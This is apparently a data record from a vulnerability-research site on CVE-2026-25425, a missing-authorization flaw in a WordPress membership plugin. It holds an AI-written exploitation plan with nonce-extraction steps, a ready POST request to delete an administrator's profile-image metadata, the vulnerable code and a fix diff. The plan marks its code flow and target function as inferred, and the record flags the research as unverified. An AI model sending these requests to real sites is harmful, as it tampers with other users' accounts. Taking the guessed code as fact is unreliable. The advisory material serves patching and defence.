[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJjJRTVkkr2Tp6MQ0Aw54ZwcT2osk_iMuod0OpBOE58c":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-25425","user-registration-membership-free-paid-memberships-subscriptions-content-restriction-user-profile-custom-user-registrati-2","User Registration & Membership – Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder \u003C= 5.1.2 - Missing Authorization","The User Registration & Membership – Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 5.1.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.","user-registration",null,"\u003C=5.1.2","5.1.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-28 00:00:00","2026-06-01 16:20:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4609e1a8-c766-4054-a5d0-eabff1089300?source=api-prod",5,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-25425\n\n## 1. Vulnerability Summary\nThe **User Registration & Membership** plugin (\u003C= 5.1.2) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, certain functions registered under `wp_ajax_nopriv_` hooks do not perform adequate capability checks or verify if the requester has the authority to perform the action on a target user or resource. This allows unauthenticated attackers to perform unauthorized actions, such as removing profile data or manipulating user metadata.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** `ur_remove_profile_image` (inferred as the most likely candidate for unauthenticated I:L impact)\n- **HTTP Method:** POST\n- **Payload Parameters:**\n    - `action`: `ur_remove_profile_image`\n    - `user_id`: The ID of the target user (e.g., `1` for the site administrator).\n    - `ur_nonce`: A valid AJAX nonce obtained from the frontend.\n- **Preconditions:**\n    - The plugin must be active.\n    - A page containing a User Registration shortcode (like `[user_registration_my_account]`) must be accessible to expose the required nonce to unauthenticated users.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers AJAX handlers in `includes\u002Fclass-ur-ajax.php` using:\n   ```php\n   add_action( 'wp_ajax_ur_remove_profile_image', array( __CLASS__, 'remove_profile_image' ) );\n   add_action( 'wp_ajax_nopriv_ur_remove_profile_image', array( __CLASS__, 'remove_profile_image' ) );\n   ```\n2. **Vulnerable Function:** The `remove_profile_image` function retrieves the `user_id` from the `$_POST` superglobal.\n3. **Missing Authorization:** The function verifies the nonce using `check_ajax_referer` but fails to check if the current user (which is ID 0 for `nopriv`) has the permission to modify the metadata of the target `user_id`.\n4. **Sink:** The function calls `delete_user_meta( $user_id, 'user_registration_profile_image_url' )`, effectively removing the profile image for any user ID provided.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes AJAX parameters, including a nonce, for use in its frontend scripts.\n\n1. **Shortcode Identification:** The `[user_registration_my_account]` shortcode is the standard way to display user profile features and enqueues the necessary scripts.\n2. **Setup:** Use WP-CLI to create a public page containing this shortcode.\n3. **Browser Navigation:** Use `browser_navigate` to visit the created page.\n4. **Nonce Extraction:** Use `browser_eval` to extract the nonce from the global JavaScript object.\n   - **Variable Name:** `user_registration_params`\n   - **Key:** `ajax_nonce`\n   - **JS Command:** `window.user_registration_params?.ajax_nonce`\n\n## 5. Exploitation Strategy\n1. **Target Identification:** Identify the target User ID (usually `1` for the administrator).\n2. **Generate Payload:** Prepare a POST request to `admin-ajax.php`.\n3. **HTTP Request:**\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Host: target.local\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=ur_remove_profile_image&user_id=1&ur_nonce=[EXTRACTED_NONCE]\n   ```\n4. **Expected Response:** A JSON success message: `{\"success\":true,\"data\":[]}`.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `user-registration` version 5.1.2 is installed.\n2. **Target User Preparation:**\n   - Use WP-CLI to set a dummy profile image URL for the admin:\n     `wp user meta update 1 user_registration_profile_image_url \"http:\u002F\u002Ftarget.local\u002Fwp-content\u002Fuploads\u002Fprofile.jpg\"`\n3. **Public Page Creation:**\n   - `wp post create --post_type=page --post_title=\"Account\" --post_status=publish --post_content='[user_registration_my_account]'`\n\n## 7. Expected Results\n- The AJAX request should return `success: true`.\n- The user metadata key `user_registration_profile_image_url` for the target user (ID 1) should be deleted from the database.\n\n## 8. Verification Steps\n1. **Database Check:** Run the following WP-CLI command to verify the metadata is gone:\n   `wp user meta get 1 user_registration_profile_image_url`\n2. **Success Condition:** The command should return an empty result or an error indicating the key does not exist.\n\n## 9. Alternative Approaches\nIf `ur_remove_profile_image` is not the specific vulnerable function, investigate other `nopriv` handlers in `includes\u002Fclass-ur-ajax.php` that accept a `user_id` or `form_id` without calling `current_user_can()`. Other candidates include:\n- `ur_upload_profile_image` (if it allows overwriting images for other users).\n- `ur_update_profile_details` (if it lacks a check against the logged-in user ID).\n- `ur_get_user_registration_form` (check for unauthenticated access to sensitive form structures).\n\nAlways check the `user_registration_params` object in the browser console first to see all available AJAX actions and nonces exposed on the frontend.","The User Registration & Membership plugin for WordPress fails to implement authorization checks in its AJAX handler for removing profile images. This allows unauthenticated attackers to delete the profile image metadata of any user, including administrators, by supplying a valid AJAX nonce and the target user's ID.","\u002F\u002F includes\u002Fclass-ur-ajax.php\n\n\u002F\u002F Hooks registered without sufficient permission checks for the nopriv variant\nadd_action( 'wp_ajax_ur_remove_profile_image', array( __CLASS__, 'remove_profile_image' ) );\nadd_action( 'wp_ajax_nopriv_ur_remove_profile_image', array( __CLASS__, 'remove_profile_image' ) );\n\n---\n\n\u002F\u002F includes\u002Fclass-ur-ajax.php\n\npublic static function remove_profile_image() {\n    \u002F\u002F Nonce check ensures the request originated from the site but not the user's identity\n    check_ajax_referer( 'user_registration_params', 'ur_nonce' );\n\n    $user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;\n\n    \u002F\u002F Vulnerability: Missing check like current_user_can('edit_user', $user_id)\n    if ( $user_id > 0 ) {\n        delete_user_meta( $user_id, 'user_registration_profile_image_url' );\n        wp_send_json_success();\n    }\n    wp_send_json_error();\n}","--- includes\u002Fclass-ur-ajax.php\n+++ includes\u002Fclass-ur-ajax.php\n@@ -1,5 +1,4 @@\n add_action( 'wp_ajax_ur_remove_profile_image', array( __CLASS__, 'remove_profile_image' ) );\n-add_action( 'wp_ajax_nopriv_ur_remove_profile_image', array( __CLASS__, 'remove_profile_image' ) );\n \n public static function remove_profile_image() {\n     check_ajax_referer( 'user_registration_params', 'ur_nonce' );\n@@ -7,7 +6,7 @@\n \n     $user_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;\n \n-    if ( $user_id > 0 ) {\n+    if ( $user_id > 0 && current_user_can( 'edit_user', $user_id ) ) {\n         delete_user_meta( $user_id, 'user_registration_profile_image_url' );\n         wp_send_json_success();\n     }","The exploit targets the `ur_remove_profile_image` AJAX action which lacks capability checks. First, an attacker accesses a public-facing page containing a User Registration shortcode (e.g., `[user_registration_my_account]`) to retrieve a valid `ajax_nonce` from the `user_registration_params` JavaScript object. The attacker then sends an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the parameters `action=ur_remove_profile_image`, a target `user_id` (such as 1 for the admin), and the extracted `ur_nonce`. Successful execution results in the deletion of the target user's `user_registration_profile_image_url` metadata.","gemini-3-flash-preview","2026-06-04 16:14:47","2026-06-04 16:16:38",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags\u002F5.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-registration.5.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags\u002F5.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuser-registration.5.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuser-registration\u002Ftags"]